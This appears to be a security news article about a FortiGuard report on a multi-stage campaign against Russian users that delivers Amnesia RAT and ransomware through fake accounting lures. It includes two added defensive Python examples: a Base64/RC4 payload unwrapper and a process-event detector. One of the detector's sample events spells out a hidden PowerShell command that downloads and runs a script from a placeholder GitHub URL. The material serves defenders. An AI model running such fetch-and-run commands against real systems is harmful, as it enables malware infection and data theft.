
Amnesia RAT deployed in multi-stage phishing attacks against Russian users

A multi-stage phishing campaign targets users in Russia with ransomware and Amnesia RAT using fake business documents as lures.

FortiGuard Labs researchers uncovered a multi-stage malware campaign mainly targeting users in Russia. The attack uses fake business documents as social engineering lures to distract victims while malware runs in the background. It escalates to full system compromise, deploying Amnesia RAT and ransomware, disabling Microsoft Defender via the Defendnot tool, and abusing GitHub and Dropbox to host payloads and evade detection.

“The threat actors further increase resilience by separating payload hosting across multiple public cloud services. GitHub is primarily used to distribute scripts, while Dropbox hosts binary payloads.” reads the report published by FortiGuard Labs. “This modular hosting approach allows attackers to update or rotate components independently, complicates takedown efforts, and helps malicious traffic blend into legitimate enterprise network activity.”

The attack chain starts when a victim opens a compressed archive that looks like normal business material. The archive contains fake accounting files with Russian names that match everyday work tasks. Inside, a shortcut file pretends to be a text document for accountants. When the user clicks it, the file launches PowerShell and downloads a script from GitHub. The threat actors do not use exploits; they rely entirely on user interaction, which makes the lure effective in corporate environments.

The PowerShell script, called kira.ps1, acts as a loader. It hides the PowerShell window to avoid suspicion and creates a fake accounting document on the system. The script opens this document to keep the user busy while malware runs in the background. It also sends a message to the attacker via Telegram to confirm the infection. After a short delay, it downloads and runs an obfuscated VBScript in hidden mode.

“Once written to disk, the decoy document is automatically opened. This reinforces the appearance of a legitimate business task and keeps the user engaged while malicious activity continues in the background.” continues the report. “After establishing this distraction, the script sends an execution confirmation to the attacker using the Telegram Bot API. The message includes user-context information, allowing the attacker to verify that the initial stage has been executed successfully on a live system.”

The VBScript, the second stage, works as the main controller. It stays encoded on disk and rebuilds the real malicious code only in memory using Base64 and RC4 decoding, which limits static detection of the file on disk. The final stage initializes system objects, checks for administrator rights, and repeatedly triggers UAC prompts until it gains elevated privileges. Once ready, the malware moves to its final operational phase and continues the attack.
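The layering described above (an RC4-encrypted payload wrapped in Base64, decoded only at run time) is the reason a file scanner sees nothing recognizable on disk. The following is an added analyst-side example, not code from the FortiGuard report or from the malware: it unwraps such a blob given the key recovered from the loader and checks whether the result reads like a script. The key, the plaintext and the `looks_like_script` markers are constructed for the demonstration and are not indicators from the campaign.

```python
"""Added example: unwrap a Base64 + RC4 staged payload for triage.

Everything here (key, sample script text, heuristics) is constructed for
illustration; none of it is an indicator taken from the campaign.
"""
import base64


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: identical routine encrypts and decrypts."""
    # Key-scheduling algorithm
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm, XORed over the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wrap_stage(plain: bytes, key: bytes) -> str:
    """Produce the on-disk form: RC4 then Base64 (used here only to build a sample)."""
    return base64.b64encode(rc4(key, plain)).decode("ascii")


def unwrap_stage(blob_b64: str, key: bytes) -> bytes:
    """Reverse the layering the way the in-memory loader does: Base64, then RC4."""
    return rc4(key, base64.b64decode(blob_b64))


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or whitespace."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data)


# Constructed heuristic markers: strings a VBScript/PowerShell stage commonly contains.
SCRIPT_MARKERS = ("createobject(", "wscript.shell", "powershell")


def looks_like_script(data: bytes) -> bool:
    """True when the bytes are mostly text and contain a script marker."""
    text = data.decode("latin-1").lower()
    return printable_ratio(data) > 0.95 and any(m in text for m in SCRIPT_MARKERS)


# Constructed sample: a harmless VBScript line standing in for the real stage.
SAMPLE_KEY = b"constructed-demo-key"
SAMPLE_PLAIN = (
    b'Set sh = CreateObject("WScript.Shell")\r\n'
    b'WScript.Echo "stage decoded (constructed sample)"\r\n'
)
SAMPLE_BLOB = wrap_stage(SAMPLE_PLAIN, SAMPLE_KEY)


def triage(blob_b64: str, key: bytes) -> dict:
    """Summarise what a scanner sees on disk versus what runs in memory."""
    on_disk = base64.b64decode(blob_b64)
    in_memory = unwrap_stage(blob_b64, key)
    return {
        "on_disk_printable": round(printable_ratio(on_disk), 2),
        "on_disk_is_script": looks_like_script(on_disk),
        "in_memory_is_script": looks_like_script(in_memory),
        "decoded": in_memory,
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_BLOB, SAMPLE_KEY).items():
        print(f"{k}: {v!r}")
```

The point for a defender is in the two `is_script` flags: the same bytes fail every string-based check on disk and pass it once decoded, so detection has to move to the process that performs the decode (script-block logging, AMSI) rather than the file that stores it.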

In the final phase, the malware launches its most damaging actions after disabling defenses and blocking recovery. It installs Amnesia RAT to maintain long-term control and steal data. The RAT hides as “svchost.scr”, gains persistence, and steals browser credentials, Telegram sessions, crypto wallets, Discord and Steam data, seed phrases, and detailed system information. It also enables screenshots, audio capture, remote commands, and data exfiltration through Telegram and file-hosting services.
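Because the chain above uses no exploit, the observable behaviour is the sequence of ordinary processes and connections: a hidden PowerShell fetching from GitHub, a Telegram Bot API call from a script host, PowerShell spawning a script interpreter, and a screensaver binary named like a system process. The following is an added detection example, not from the FortiGuard report: it runs simple rules over constructed Sysmon-style process and network events and scores how much of the chain is present. The event records, PIDs, and the placeholder GitHub URL are constructed; only the behaviours (hidden window, GitHub download, Telegram Bot API, `kira.ps1`, `svchost.scr`) come from the article.

```python
"""Added example: rule-based detection of the loader chain over constructed events."""
from dataclasses import dataclass
from typing import List, Tuple

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_INTERPRETERS = {"wscript.exe", "cscript.exe"}
SCRIPT_HOSTS = POWERSHELL | SCRIPT_INTERPRETERS


@dataclass
class Event:
    """Minimal Sysmon-like record (constructed schema)."""
    kind: str                 # "process" (creation) or "network" (outbound connection)
    pid: int
    image: str                # executable file name
    parent_image: str = ""
    cmdline: str = ""
    dest_host: str = ""


def _hidden_window(cmdline: str) -> bool:
    """PowerShell window hidden via -WindowStyle Hidden (or its -w abbreviation)."""
    c = " ".join(cmdline.lower().split())
    return "-windowstyle hidden" in c or "-w hidden" in c


def detect(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule_id, pid) pairs for every event that matches a chain behaviour."""
    alerts = []
    for e in events:
        img = e.image.lower()
        parent = e.parent_image.lower()
        cmd = e.cmdline.lower()
        if e.kind == "process":
            # Stage 1: shortcut launches hidden PowerShell that pulls a script from GitHub.
            if img in POWERSHELL and _hidden_window(cmd) and "github" in cmd:
                alerts.append(("HIDDEN_PS_GITHUB_DOWNLOAD", e.pid))
            # Stage 2: the loader hands off to an encoded VBScript via a script interpreter.
            if img in SCRIPT_INTERPRETERS and parent in POWERSHELL:
                alerts.append(("PS_SPAWNS_SCRIPT_INTERPRETER", e.pid))
            # Final stage: RAT masquerading as svchost but shipped as a .scr file.
            if img.endswith(".scr") and "svchost" in img:
                alerts.append(("SVCHOST_SCR_MASQUERADE", e.pid))
        elif e.kind == "network":
            # Execution confirmation to the attacker through the Telegram Bot API.
            if e.dest_host.lower() == "api.telegram.org" and img in SCRIPT_HOSTS:
                alerts.append(("SCRIPT_HOST_TELEGRAM_BOT_API", e.pid))
    return alerts


def chain_confidence(alerts: List[Tuple[str, int]]) -> str:
    """Any single rule is noisy; several distinct stages together are not."""
    distinct = {rule for rule, _ in alerts}
    if len(distinct) >= 3:
        return "high"
    if len(distinct) == 2:
        return "medium"
    return "low" if distinct else "none"


# Constructed telemetry: one infection chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    Event("process", 1001, "powershell.exe", "explorer.exe",
          'powershell.exe -WindowStyle Hidden -Command "iwr https://github.com/PLACEHOLDER/kira.ps1 -OutFile kira.ps1; .\\kira.ps1"'),
    Event("network", 1001, "powershell.exe", dest_host="api.telegram.org"),
    Event("process", 1002, "wscript.exe", "powershell.exe", "wscript.exe stage2.vbs"),
    Event("process", 1003, "svchost.scr", "wscript.exe", "svchost.scr"),
    # Benign: admin script with a visible window and no download.
    Event("process", 2001, "powershell.exe", "explorer.exe", "powershell.exe -File C:\\Scripts\\backup.ps1"),
    # Benign: a browser talking to Telegram is not a script-host beacon.
    Event("network", 2002, "chrome.exe", dest_host="api.telegram.org"),
]


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for rule, pid in found:
        print(f"{rule:32} pid={pid}")
    print("chain confidence:", chain_confidence(found))
```

The two benign records show the design choice: each rule is scoped to the process type the article describes (a script host, not any process) so legitimate Telegram use or an ordinary admin script does not fire, while the confidence score rewards seeing several stages rather than one.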

“Amnesia RAT is designed for broad, multi-category data theft combined with real-time surveillance and system control.” continues the report.

Afterward, the attack deploys Hakuna Matata ransomware. This payload encrypts a wide range of files, adds a custom extension, drops ransom notes, changes the wallpaper, kills key processes, and replaces crypto addresses in the clipboard. In parallel, a WinLocker component fully blocks the desktop and shows messages that pressure victims to contact attackers quickly.

“The ransomware maintains a continuous execution loop that actively monitors and hijacks clipboard contents, replacing cryptocurrency wallet addresses with attacker-controlled values.” continues the report. “Combined with encryption, lockout mechanisms, and coercive visual messaging, these behaviors demonstrate an attack model built for maximum leverage, sustained control, and financial extraction.”

Together, these steps ensure maximum disruption, control, and financial leverage.

“This attack chain demonstrates how modern malware campaigns can achieve full system compromise without exploiting software vulnerabilities.” concludes the report. “Instead, the threat actor relies on social engineering, widely trusted platforms such as GitHub and Dropbox, and the abuse of legitimate operating system functionality to stage, deliver, and execute payloads while blending into normal enterprise traffic.”

Pierluigi Paganini

(SecurityAffairs – hacking, Amnesia RAT)